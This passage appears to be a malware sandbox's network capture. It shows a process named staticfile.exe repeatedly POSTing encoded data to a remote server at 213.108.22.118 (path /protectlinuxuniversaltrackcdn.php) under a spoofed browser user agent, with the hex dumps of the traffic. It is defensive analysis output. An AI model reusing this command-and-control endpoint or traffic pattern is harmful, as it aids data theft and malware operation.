                                        Date: Sat, 30 Nov 2024 21:38:43 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 14 3f 01 31 00 28 3b 3d 1e 3a 3c 2f 0c 32 16 31 10 3b 3e 31 5c 2b 03 3e 03 3d 3c 3e 0e 21 28 28 04 3c 39 3e 53 26 26 2a 5c 28 3b 2b 5e 0c 1b 20 40 28 02 31 5e 24 15 0a 5d 30 0e 3f 02 22 32 3b 5b 27 5b 3a 1c 3c 16 07 00 22 31 25 09 2d 22 25 54 26 00 38 5e 3e 3c 23 56 21 03 2f 56 0b 12 21 08 33 32 21 5f 26 11 30 1f 20 09 2e 5e 35 08 00 11 23 3c 36 0a 21 28 26 11 28 00 3a 5b 20 0d 33 0b 2a 2d 0b 10 24 22 37 19 3d 3d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #?1(;=:</21;>1\+>=<>!((<9>S&&*\(;+^ @(1^$]0?"2;['[:<"1%-"%T&8^><#V!/V!32!_&0 .^5#<6!(&(:[ 3*-$"7==/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        123192.168.2.450125213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:42.589046955 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:42.935781002 CET2544OUTData Raw: 50 59 59 5c 50 5a 50 5b 55 5c 57 59 50 5e 5a 50 58 55 5b 5f 51 5c 53 5d 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PYY\PZP[U\WYP^ZPXU[_Q\S]U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!E+>671?///T1(S34=6;[7=R'=+]2U>9._/%^/4
                                        Nov 30, 2024 22:38:44.274784088 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:44.301315069 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:43 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ
                                        Nov 30, 2024 22:38:44.322793961 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:43 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        124192.168.2.450126213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:44.560159922 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:38:44.904833078 CET2544OUTData Raw: 50 5c 5c 59 50 5d 55 5f 55 5c 57 59 50 52 5a 56 58 59 5b 5e 51 50 53 5d 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P\\YP]U_U\WYPRZVXY[^QPS]U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!<.4'1.#;<3S%8?3 >%#:0>?&#6X-4._/%^/
                                        Nov 30, 2024 22:38:45.877933025 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:46.110996962 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:45 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        125192.168.2.450127213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:46.355328083 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:46.703022003 CET2544OUTData Raw: 50 5b 59 5c 55 5d 50 5d 55 5c 57 59 50 59 5a 5c 58 5b 5b 5a 51 5e 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P[Y\U]P]U\WYPYZ\X[[ZQ^SXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!(>:\ 20Y&;7%]40=[(%<7/=$'%0>X.$._/%^/(
                                        Nov 30, 2024 22:38:48.733278990 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:48.976042986 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:48 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        126192.168.2.450128213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:49.231941938 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        127192.168.2.450129213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:49.420145988 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:49.779576063 CET1428OUTData Raw: 50 5e 59 5e 55 5e 50 5e 55 5c 57 59 50 5e 5a 57 58 58 5b 5d 51 5f 53 5a 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P^Y^U^P^U\WYP^ZWXX[]Q_SZU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!(6]#;%<,?+V&W$[<=5,#?37]$05,4._/%^/4
                                        Nov 30, 2024 22:38:50.853049994 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:51.109532118 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:50 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 16 3c 28 36 5c 3c 28 2d 5b 2c 2f 0a 13 24 2b 25 1d 38 2d 29 1b 29 29 36 06 3e 3f 3d 1f 35 01 30 02 2a 29 21 0f 33 0f 2a 5d 3c 01 2b 5e 0c 1b 23 18 3c 05 2d 59 24 2b 0a 58 25 23 30 5a 22 21 09 5b 33 03 22 57 3e 3b 39 00 37 0f 26 50 2d 22 2e 0a 25 3a 38 11 29 3c 20 0c 22 39 2f 56 0b 12 22 1b 24 22 22 06 32 11 20 5c 37 0e 39 07 21 26 3e 5d 34 2f 39 54 35 16 0f 01 3c 00 25 07 23 33 05 0a 29 04 22 03 26 1c 33 19 3e 07 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #<(6\<(-[,/$+%8-)))6>?=50*)!3*]<+^#<-Y$+X%#0Z"![3"W>;97&P-".%:8)< "9/V"$""2 \79!&>]4/9T5<%#3)"&3>/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        128192.168.2.450130213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:49.540610075 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:49.888988972 CET2544OUTData Raw: 50 5a 59 5f 55 5a 50 5e 55 5c 57 59 50 58 5a 52 58 5e 5b 59 51 5c 53 5a 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PZY_UZP^U\WYPXZRX^[YQ\SZU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!C+-.77%.;<<1;0. )6']4=U'[?\2X-._/%^/,
                                        Nov 30, 2024 22:38:50.924582005 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:51.168066025 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:50 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        129192.168.2.450131213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:51.412508011 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:38:51.764027119 CET2544OUTData Raw: 55 5f 59 5f 50 5d 50 5b 55 5c 57 59 50 5d 5a 5d 58 5f 5b 53 51 5e 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U_Y_P]P[U\WYP]Z]X_[SQ^S_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+)#"#2,,Z3W&84S$+(&/Z#Y=R3-_23Y9$._/%^/8
                                        Nov 30, 2024 22:38:53.794708014 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:54.036010981 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:53 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        130192.168.2.450132213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:54.276968956 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:54.624906063 CET2544OUTData Raw: 55 5c 5c 5e 55 5e 50 5f 55 5c 57 59 50 52 5a 51 58 54 5b 58 51 50 53 5e 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\\^U^P_U\WYPRZQXT[XQPS^U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+._#"&,/+R1+%-*%04'=&0&^9$._/%^/
                                        Nov 30, 2024 22:38:55.527643919 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:55.775888920 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:55 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        131192.168.2.450134213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:56.244832039 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:56.592286110 CET1428OUTData Raw: 55 5a 59 5a 50 5e 50 59 55 5c 57 59 50 53 5a 53 58 5b 5b 53 51 5b 53 5e 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UZYZP^PYU\WYPSZSX[[SQ[S^U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!B*=-4";%#;<&<04)&3\7*$\%:_:4._/%^/
                                        Nov 30, 2024 22:38:57.642132998 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:57.893572092 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:57 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 16 3c 06 3a 10 2b 5e 35 58 2c 2c 30 56 25 5e 2d 5a 2d 3e 26 06 28 29 29 12 3e 3c 31 10 35 16 27 1f 28 3a 2d 0b 27 50 35 04 3f 01 2b 5e 0c 1b 20 42 28 02 2e 01 30 38 27 00 24 30 28 5a 20 21 09 59 33 2d 03 0f 3f 2b 35 04 37 31 3a 51 2f 1c 21 52 26 2a 27 00 29 3c 33 11 35 13 2f 56 0b 12 22 14 26 32 07 5b 31 3c 20 11 20 33 32 1a 22 08 0b 01 37 3f 0f 1e 23 3b 22 58 3f 10 0c 5e 20 0a 27 0e 2a 03 04 03 26 0c 20 08 3e 07 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #<:+^5X,,0V%^-Z->&())><15'(:-'P5?+^ B(.08'$0(Z !Y3-?+571:Q/!R&*')<35/V"&2[1< 32"7?#;"X?^ '*& >/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        132192.168.2.450135213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:56.372996092 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:56.717250109 CET2544OUTData Raw: 50 5a 59 5f 50 5d 50 5b 55 5c 57 59 50 5f 5a 54 58 54 5b 5d 51 5f 53 5b 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PZY_P]P[U\WYP_ZTXT[]Q_S[U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+>)7;&>/?4$(<0 )&#["?-&>?\2",$._/%^/0
                                        Nov 30, 2024 22:39:00.734528065 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:39:00.976169109 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:39:00 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        133192.168.2.450136213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:01.225245953 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:39:01.576545954 CET2544OUTData Raw: 50 59 5c 5e 50 5e 50 5f 55 5c 57 59 50 5e 5a 56 58 5f 5b 5e 51 51 53 5a 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PY\^P^P_U\WYP^ZVX_[^QQSZU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!(X24";28< 1+80?Z=6$#!T'.71 :_.._/%^/4
                                        Nov 30, 2024 22:39:02.547854900 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:39:02.787024021 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:39:02 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        134192.168.2.450138213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:03.031332970 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:39:03.389153004 CET2544OUTData Raw: 50 59 59 55 55 58 55 58 55 5c 57 59 50 5f 5a 50 58 5b 5b 52 51 59 53 55 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PYYUUXUXU\WYP_ZPX[[RQYSUU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"?-*_42(_28Z8/0&]('-7X(6;]#,!R3='[2%-._/%^/0
                                        Nov 30, 2024 22:39:04.365993977 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:39:04.608130932 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:39:04 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        135192.168.2.450139213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:04.930932045 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:39:05.279747009 CET2544OUTData Raw: 55 58 5c 59 55 5f 50 5f 55 5c 57 59 50 5e 5a 54 58 59 5b 5b 51 58 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UX\YU_P_U\WYP^ZTXY[[QXSXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!*>672 &X(_8?R%T%-7=/X7?$.#_23*Y9$._/%^/4
                                        Nov 30, 2024 22:39:06.219460964 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:39:06.464288950 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:39:05 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        136192.168.2.450140213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:06.713848114 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:39:07.060939074 CET2544OUTData Raw: 55 5d 59 5d 50 5a 50 5d 55 5c 57 59 50 5d 5a 54 58 5c 5b 5e 51 5f 53 5b 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
